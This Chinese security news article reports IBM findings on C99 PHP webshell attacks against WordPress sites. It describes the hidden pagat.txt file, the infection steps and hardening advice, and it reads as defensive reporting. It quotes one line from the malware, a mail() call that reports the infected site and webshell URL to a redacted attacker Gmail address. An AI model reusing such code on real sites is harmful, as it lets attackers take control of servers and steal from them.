C99 php webshell攻击加剧，大量WordPress站点遭受威胁

近期，IBM的管理安全服务(MSS) 团队发出警告，称其监测到通过利用 C99 php webshell， 大量 WordPress 站点遭受到新的攻击 ，提醒 WordPress 站点管理员应及时扫描并修复站点漏洞。

据悉，基于IBM MSS团队长期对恶意事件的监测分析， 安全研究人员 发现在过去的两个月，出现了类C99 webshell引起的流量异常，其中在二月份监测到的事件数量为404件，而在三月份则达到588件，具体如下，

我们知道，通过Webshell可将恶意文件上传到Web服务器上或者使用将命令传递到服务器上执行。其可通过多种编程语言代码来编写，从PHP到ASP.NET，从 JavaScript到Ruby，皆可使得攻击者控制服务器，而c99 webshell则常为攻击者所使用。

警惕pagat.txt文件

IBM MSS安全团队称，攻击者往往利用站点插件的安全漏洞，通过C99 webshell对其进行感染。在最初感染的阶段，webshell脚本被上传到了服务器，并以一个文本文件存放于服务器上，据研究发现，通常情况下该文本文件名为 pagat.txt。在这个文件中，IBM安全研究人员也发现了被进行混淆处理的PHP源代码，相关代码段如下，

为了使代码更加模糊化以及使得对感染行为的检测更加困难，攻击者并没有把上述的文本文件放置在服务器的根目录下或是存放在插件的目录文件夹里面。在大部分案例中，pagat.txt文件一般是存放在以下路径中的。

“http://www.website-name.com/wp-content/themes/twentythirteen/pagat.txt”

我们也可以根据这个路径，对自身的WordPress 站点服务器进行检查，看是否存在可疑文件。

攻击步骤

攻击者找到路径将文本内容传输到服务器的PHP解释器上。在执行恶意代码之后，简单来说 ， 一般会执行以下操作，

首先，是发送邮件給攻击者，通过邮件内容告知当前感染站点的具体位置。此封邮件是发送到一个 Gmail地址的邮箱，其中包含web站点的域名以及webshell的URL。

mail(“<strong>XXXXX@gmail.com</strong>“, “$body”, “Hasil Bajakan hxxp://$web$inj

接着，通过 pagat.txt文件内含的代码，在站点目录下创建一个表单页面，具体如下，

最后，攻击者通过浏览器访问新创建的表单文件，便可传递命令或上传文件到服务器上了，访问页面如下，

如上图所示，Webshell可允许攻击者在服务器上运行终端命令或上传新的文件到站点上，新的文件可以是更具侵入性的webshells，DDoS客户端，比特币矿工软件或者是其他的恶意软件。

据IBM  MSS团队称，截至至2016年4月12日，仅通过Google 搜索引擎简单查询，就发现其中约有32000个WordPress站点存在pagat.txt文件。

安全建议

基于目前的情况，建议站点管理员可以进行如下操作，

1、编辑php.ini文件，禁用base64解码功能。在php.ini文件中，找到相关配置语句“disable_functions =”，将该语句设置成“disable_functions = eval，base64_decode, gzinflate”；

2、更改上传文件夹名称。WordPress 允许通过上传程序将文件写入到上传文件夹， 如果用户仍然使用默认名称，攻击者可较为容易推测到上传文件的具体路径， 使得攻击者上传包含 shell 脚本的PHP文件的成本大大降低；

3、安装一款可用性较强的安全插件，如 wordfence WordPress 插件；

4、进行安全扫描。建议使用开源扫描工具，对上传文件进行全量扫描，这里可使用扫描工具 Modsecurity ，同时通过AWVS或者 WordPress 安全扫描器 对站点进行扫描，及时发现漏洞，并进行修复加固；

5、如果发现站点已经被感染了，建议及时变更站点的所有管理账户密码，并告知站点用户进行密码变更。

＊参考来源： Softpedia , Securityintelligence ，FB小编troy编译，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM）